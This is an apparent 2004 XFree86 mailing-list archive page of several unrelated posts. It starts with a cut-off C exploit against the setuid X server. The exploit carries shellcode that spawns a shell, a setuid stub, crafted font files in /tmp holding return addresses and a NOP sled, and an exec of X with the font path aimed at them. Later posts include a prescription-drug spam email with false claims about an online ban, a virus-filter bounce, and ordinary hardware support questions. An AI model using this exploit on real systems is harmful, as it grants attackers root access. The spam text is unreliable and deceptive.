\x89\xe3 /* movl%esp,%ebx  */
\x50 /* pushl   %eax   */
\x53 /* pushl   %ebx   */
\x89\xe1 /* movl%esp,%ecx  */
\x99 /* cdql   */
\xb0\x0b /* movb$0x0b,%al  */
\xcd\x80 /* int $0x80  */
;

char jump[]=
\x8b\xc4/* movl   %esp,%eax   */
\xc3/* ret*/
;


main(int argc,char **argv){
char buffer[2],adr[4],pch[4],*b,*envp[4];
int i,fd;


*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+16000;

envp[0]=buffer[2000];
envp[1]=0;

printf(adr: 0x%x\n,adr+12000);

b=buffer;
strcpy(buffer,1\n);
strcat(buffer,.pcf 
 --fixed-small-a-semicondensed--1-1-1-1-a-1-iso-1\n);
fd=open(/tmp/fonts.dir,O_CREAT|O_WRONLY,0666);
write(fd,buffer,strlen(buffer));

for(i=0;iADRNUM;i++) *b++=adr[i%4];
*b++='\n';

fd=open(/tmp/fonts.alias,O_CREAT|O_WRONLY,0666);
write(fd,buffer,strlen(buffer));
close(fd);

b=buffer[2000];

for(i=0;iNOPNUM-strlen(setuidcode)-strlen(setuidcode)-strlen(shellcode);i++) 
*b++=0x90;
for(i=0;istrlen(setuidcode);i++) *b++=setuidcode[i];
for(i=0;istrlen(shellcode);i++) *b++=shellcode[i];
*b=0;

execle(/usr/bin/X11/X,X,:0,-fp,/tmp,0,envp);
}

 -- 
[EMAIL PROTECTED]
SDF Public Access UNIX System - http://sdf.lonestar.org
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] Che.apest V_I.AG.R_A alt.ernative Date Number059

2004-02-12 Thread dulcesiebold
HURRY STOCK UP NOW! ON ALL YOUR FAVOURITE DRUGS!

URGENT: You won't be able to buy meds online after March!
  
Buying meds online will be banned starting
March 1, 2004. NOW is the time to buy and
stock up on them. You will not be able to buy
then online like you have before. 
DONT WAIT, BUY NOW! 

We have VALIUM, SOMA, XANAX, ADIPEX, BONTRIL, CIALIS (SUPER VIAGARA), + 100's MORE!

LOW PRICES. ONLINE BLOWOUT BEFORE NEW LAW TAKES EFFECT!


http://wynn.calsledd.com/m0015/index.php?id=m0015





























This email was intended for this party. If it was sent to the wrong address then 
please remove yourself as someone may have added you to our optin mailing lists. Allow 
72 hours for removal.
http://sharon.calsledd.com/a.html

W
excretion sorenson athletic baltimore thetis laotian ductile diameter nabla 
phraseology thunderous carlin 

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] Xserver Problem

2004-02-12 Thread Admin
Dear all,
I have isntalled Redhat 9.0 and whever i give command for startX it show the
follwing attached message. Can u pelase throw some light on what do do next.
Regards
Ashish

-Original Message-
From: root [mailto:[EMAIL PROTECTED]
Sent: Friday, February 13, 2004 11:08 AM
To: [EMAIL PROTECTED]
Subject: Forwarded mail




-- Forwarded message --
Date: Fri, 13 Feb 2004 11:06:44 +0530 (IST)
From: root [EMAIL PROTECTED]
To: [EMAIL PROTECTED]


XFree86 Version 4.3.0 (Red Hat Linux release: 4.3.0-2)
Release Date: 27 February 2003
X Protocol Version 11, Revision 0, Release 6.6
Build Operating System: Linux 2.4.20-3bigmem i686 [ELF] 
Build Date: 27 February 2003
Build Host: porky.devel.redhat.com
 
Before reporting problems, check http://www.XFree86.Org/
to make sure that you have the latest version.
Module Loader present
OS Kernel: Linux version 2.4.20-8 ([EMAIL PROTECTED]) (gcc version 3.2.2 20030222 (Red 
Hat Linux 3.2.2-5)) #1 Thu Mar 13 17:54:28 EST 2003 
Markers: (--) probed, (**) from config file, (==) default setting,
 (++) from command line, (!!) notice, (II) informational,
 (WW) warning, (EE) error, (NI) not implemented, (??) unknown.
(==) Log file: /var/log/XFree86.0.log, Time: Fri Feb 13 10:41:40 2004
(EE) Unable to locate/open config file
(EE) Error from xf86HandleConfigFile()

Fatal server error:
no screens found

When reporting a problem related to a server crash, please send
the full server output, not just the last messages.
This can be found in the log file /var/log/XFree86.0.log.
Please report problems to [EMAIL PROTECTED]



[XFree86] Virenchecker Information

2004-02-12 Thread virencheck
Dies ist eine automatisch generierte Meldung - auto-generated email .

Die Mail mit folgenden Eigenschaften - orignal mail header :

Subjekt:  Server Report
Absender / from: [EMAIL PROTECTED]
Empfänger / to : [EMAIL PROTECTED]

wurde nicht weitergeleitet, da sie vermutlich ein oder mehrere Attachment[s]
mit potentiell gefährlich eingestufter Extension enthält!

Our spam filter rejected this transaction, because of potentiell dangerous
attachments

Für die Bewertung relevanter Abschnitt - reason causing rejection :

1 name=doc.pif
2 filename=doc.pif


___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] Status for i855GM and 1400x1050?

2004-02-12 Thread Christopher Thom
Quoth Odd Christer Brovig:

 What is the status for this chipset and resolution? Will it work native
 in 4.4.0? I've had no success of getting the mode up and running in both
 4.3.0 with 855patch and 4.4.0 rc2(installed from binaries provided by
 xfree86.org).

not unless there has been a *significant* rewrite of the driver, which is
unlikely (and there hasn't been any news about it - I assume we'd know).

I _do_ recall a while back someone saying that intel had released an 855
Video Bios update, which included this mode (so X couldthen use it), but
it relies on your manufacturer incorporating this into a system BIOS
update.

On dell machines at least, this seems very unlikely :-(

I feel you pain - in fact, I'm experiencing it right now :)

cheers
chris
___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] Intel 845-G problems

2004-02-12 Thread Christopher Thom
Quoth Björn Wikström:

 I've just installed Slackware 9.1 and now I'm having trouble with the
 X-configuration. I have the Intel 845-G video card and as far as I know
 the drivers for this card is in the i810-driver package? When I'm
 running the 'xf86config' I put in all the correct values for my card,
 mouse and whatever, but still I get the errors saying something about
 the BIOS and depth is not correct. I'm pretty new to Slack and Linux in
 general, so if someone could give me an step-by-step HOWTO I would
 really glad. :)

First read and digest:
http://www.chzsoft.com.ar/855patch.html
http://www.xfree86.org/~dawes/845driver.html

My linux-on-laptops page has some info:
http://astronomy.swin.edu.au/staff/cthom/laptop/

That should get you pointed in the right direction.  Of course, the
easiest thing to do is to avoid the whole mess and install X from the 4.4
release candidates, available at www.xfree86.org.  The fixes have been
incorporated.

cheers
chris


___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


Re: [XFree86] Error de Xfree86

2004-02-12 Thread Youssef Aoun



Hola,tengo el mismo error. Me parece que el 
"Hardware" no esta conocido por XFree86. Voy a ver dentro de 2 
dias.

Buena suerteCordialmente,
Youssef Aoun

  - Original Message - 
  From: 
  Enzo Labruzzo 
  To: [EMAIL PROTECTED] 
  Sent: Thursday, February 12, 2004 8:01 
  PM
  Subject: [XFree86] Error de Xfree86
  Buenas TardesActualmente tengo problemas con mi 
  drivers de video la maquina es Marca: Dell, Modelo: GX270 
  Optiplex.Este es el error que me da: Fatal server 
  error 
  no screens foundSi me pueden ayudar se lo 
  agradezcoGraciasDefensoria del PuebloDirección de 
  InformaticaEnzo La BruzzoAdministrador de RedesTlf./Fax 
  0212.5783440Celular: 
  0412.9944674___XFree86 
  mailing list[EMAIL PROTECTED]http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] (no subject)

2004-02-12 Thread Gul Meltem Kulali
Hello...
I am using 2 touchscreen monitors on my Linux Redhat 7.3 
computer...mouse is ok... I can not calibrate touch...I guess 
elographics does not support multihead... Is there any one who can help 
me about this problem...

thank you

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86


[XFree86] RE: Which graphics card to buy?

2004-02-12 Thread Rahul Sawarkar
The following urls should help you decide on Radeons

http://dri.sourceforge.net/cgi-bin/moin.cgi/ATIRadeon
http://www.xfree86.org/current/DRI3.html
Rgrds

___
XFree86 mailing list
[EMAIL PROTECTED]
http://XFree86.Org/mailman/listinfo/xfree86